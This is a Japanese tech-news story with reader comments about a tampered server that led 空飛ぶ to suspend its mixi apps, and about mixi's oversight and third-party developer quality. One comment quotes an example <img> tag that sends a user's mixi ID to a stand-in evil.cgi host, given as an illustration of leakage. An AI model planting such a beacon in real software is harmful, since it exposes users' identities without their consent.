
mixiアプリを提供していたサーバーが改竄被害、サービス停止に 21
ストーリー by hylom
mixiだからしょうがない 部門より
mixiだからしょうがない 部門より
あるAnonymous Coward 曰く、
「マイミク通信簿」や「今日の名言」など、mixiをやっている人なら結構な頻度で目にするであろうmixiアプリを提供していた「空飛ぶ」(現在は改竄の影響からかHP不通状態)が、サーバーを改竄されたとしてアプリケーションの提供を停止する事態が起きている。
mixiにとってmixiアプリはmixiの利益予想の下方修正に繋がるほどのインパクトがあったようだが、問題は色々とありそうだ。
タレコミ人としては、こういった危険な状態をなぜmixiが気がつけなかったのか、管理体制に疑問を感じずには居られない。
ちなみにこの「空飛ぶ」、以前もmixiのユーザートップページに制限なしに任意のHTMLコードを書けるというアレなmixiアプリ「フリーエリア」を公開して一部で話題になっていた(なお、こちらはすぐに「mixiアプリの規約に違反している」として公開中止になっている)。
一次ソースというか (スコア:4, 参考になる)
タレコミよりこっちのほうが詳しい
♯というかmixiに通報した人っぽい
『mixiアプリ』という脆弱性 - Yoshino Inamoriの日記 [srad.jp]
全部別の話? (スコア:2, すばらしい洞察)
mixiやってねーから、よくわからんのだけど、
・特定のアプリを開発している会社の問題
・インフラに金がかかりすぎたmixiアプリの問題
・mixiアプリの審査体制の問題
全部いっぺんに書いてる?
Re:全部別の話? (スコア:1)
一番の問題は、安全に「外のもの」を中に入れたり「中のもの」を外に出すことの難しさをmixi側が認識していなかったことでしょう。
これまでは、mixiがクラックされない限り、mixi内にさえいれば、安全であったのですが、
外の世界を取り込んだり、外の世界に中のデータを渡してしまえば、その前提が成り立たなくなるのです。
えらくいい加減な仮定ですが、全てのサービスが、クラックされない可能性がともに等しくa(1)とすると、
mixiだけであれば、クラックされる確率は1-aなのですが、n-1個の外部サービスを加えると、クラックされる確率は1-a^nに増えてしまうのです。
# mixiアプリが始まった当初、自分のmixi日記に、アプリが<img src="http://www.example.com/evil.cgi?id=${USER_ID}">と出力したらIPとmixiIDを紐付けされる、と書いてた。
# もうされてるのかなぁ?
1を聞いて0を知れ!
Re:全部別の話? (おふとぴちゃちゃおげふぃん: -9999) (スコア:0)
ごめん、全く関係のない話だけれど、
中とか外とか言う前に、ちゃんとゴムしましょうよ、とか瞬間的に思った自分はBANされるべきだと思いました。orz
#普通の発言がエロく見える程度には欲求不満ぽいのでAC
Re:全部別の話? (おふとぴちゃちゃおげふぃん: -9999) (スコア:1, 参考になる)
>中とか外とか言う前に、ちゃんとゴムしましょうよ、
つまりOAuthを使って密着しているけれど明示的に分離しましょう、ということですね分かります。
Re: (スコア:0)
だな。更に言うなら
・アプリをアウトソーシングしてもウマーとなるとは限らない
ってのはでかいかと。
ここしばらくなんでもかんでもアウトソーシングでOKみたいな流れがあるので
きちんと適材適所でやるようになれば良いやね。
Re: (スコア:0)
mixiもtwitterもやってないし、自分のwebページも持っていない俺様はやっぱり幸せだな
疑問ねぇ…… (スコア:2, すばらしい洞察)
???? アカウント作れば平文でパスワードがメールで送られてくるし、 https のページからわざわざ login しても http に飛ぶようなサイトの管理体制に想像が付かないなんて、 タレコミ人の方に疑問を感じるのだが? 部門名通りというのが業界標準なのでは?
-- 哀れな日本人専用(sorry Japanese only) --
Re:疑問ねぇ…… (スコア:2, おもしろおかしい)
perlで作った程度のことを自慢気に語っちゃうようなところですからね。
Re: (スコア:0)
上場企業ならPHPを使うべきところらしいですからね。
Re:疑問ねぇ…… (スコア:2, 興味深い)
ITmedia News記事がmixiニュースに掲載されたのも、ようやく昨日になってからでした。毎日更新されてるので、土日休んでましたとかでもなさそうです。おかげでこの記事で日記を書いてる人さえごく少数です。アプリ登録者の割りにあまりに少ないのは、たぶんほとんど気づかれてないためでしょう。
原因などは調査中だそうですがサーバーは既に改竄済みなわけで、もしかすると「プロでもなかなか見つけられない」Wormが仕掛けられている可能性だってあります。それがGENOウィルスみたいな代物で、改竄後に一度でもアプリを使ったユーザーのPCには侵入していて何かの拍子に一気に…という事だって無いとは言えません。イタチごっことはいえ、原因不明だろうがなんだろうがユーザーに対して「念のためウィルスチェックしてください」と呼びかける事さえやらないのはそれこそトヨタじゃありませんが隠蔽と言われたって仕方ないと思います。
#完全ではないにしても、まず不安感の払拭って大切だと思う。
#アプリ使えない!→サーバー改竄だってよ!→うちのマシン本当に大丈夫?→mixi沈黙→ねぇ大丈夫なの?→mixi沈黙…
#おーい、出て来ーい→mixi沈黙→mixi「大丈夫でした。ご安心を。」→怒り爆発!!
Re: (スコア:0)
> #おーい、出て来ーい→mixi沈黙
→石を投げ込んでみる、かと思った。
デベロッパー(サードバーティ)のクオリティが低すぎる (スコア:1)
デベロッパー(サードバーティ)のクオリティが低すぎると思います。
どこかが儲けたら一斉にパクり始める。
バグ満載、ブラウザによって動かない、重過ぎる、サーバー落ちる…。
でもアイテム課金だけはきっちり設計してるw
海外じゃFacebookで大儲けしてる例があるから、怪しいベンチャーが押し寄せてるんじゃないでしょうか。
個人的には、早く大手ゲームメーカーに参入して貰いたいと思います。
Re:デベロッパー(サードバーティ)のクオリティが低すぎる (スコア:1, すばらしい洞察)
まさに今回、トラブルを起こした会社が「怪しいベンチャー」の代表格かも。
公式のサポート用コミュニティーは完全放置(ちなみに今までもバグ報告や不都合な情報は放置)、公式mixiアカウントもアプリ停止してから告知は変わらず、会社HPは落ちたまま。社長のTwitterでもこの件は華麗にスルー。
夜逃げかな?とか思ったけど、公式アカウントはログインしてる形跡は一応ある。
技術力とかセキュリティ体制以前に、リテラシーとか商売への態度とか、そういう部分が根本的に欠落してるようにしか見えない。
Re:デベロッパー(サードバーティ)のクオリティが低すぎる (スコア:1, 興味深い)
空飛ぶ、3,500万円の第三者割当増資を実施
~「mixiファンド」により、ソーシャルアプリ事業を拡大 ~
http://74.125.153.132/search?q=cache:http://blog.soratobu.jp/2009/09/1003/ [74.125.153.132]
Re: (スコア:0)
そのうち会社が飛びそうですけど。
Re:デベロッパー(サードバーティ)のクオリティが低すぎる (スコア:2, 参考になる)
日本時間で2010年3月2日21:00現在
公式HP [soratobu.jp]まだ不通
Twitterアカウント(公式) [twitter.com] 2/15から書き込みなし(本件へのフォローも当然なし)
社長のTwitterアカウント [twitter.com] 2/25以降も書き込みはあるけど、この件に関しては何も言及なし
【mixi内注意】社長のmixiアカウント [mixi.jp] 最終ログインは数時間前になってるものの言及なし
【mixi内注意】「空飛ぶ」のmixiアカウント [mixi.jp] 2/25のアプリ停止時に告知文を出したまま更新なし(最終ログインは数時間前)
【mixi内注意】「空飛ぶ」製のアプリで一番ユーザーの多い「マイミク通信簿」のサポートコミュニティ(公式) [mixi.jp] 今回の件の告知すらないまま放置
もう夜逃げして、どっか適当な場所からアクセスしてるだけなんじゃね?
Re: (スコア:0)
他の資本が入っていて、簡単に逃げられるとは思えないので
「ほとぼり冷めるまで雲隠れしてて」と指示されてるのかも。
誰に、までは言わないけどね。
Re: (スコア:0)
ちょろいブラウザゲーにアイテム課金するだけでジャブジャブ儲かるんだから、
そりゃもう推して知るべしですよ。
Re: (スコア:0)
一般論ですが、頂点の質を高める簡単かつ唯一の方法は量を増やすことで、量を増やせば底辺の質は落ちるのです。日本ではなぜか頂点だけを掬い取ろうとする(そして失敗する)のですが。
言ってしまえば (スコア:0)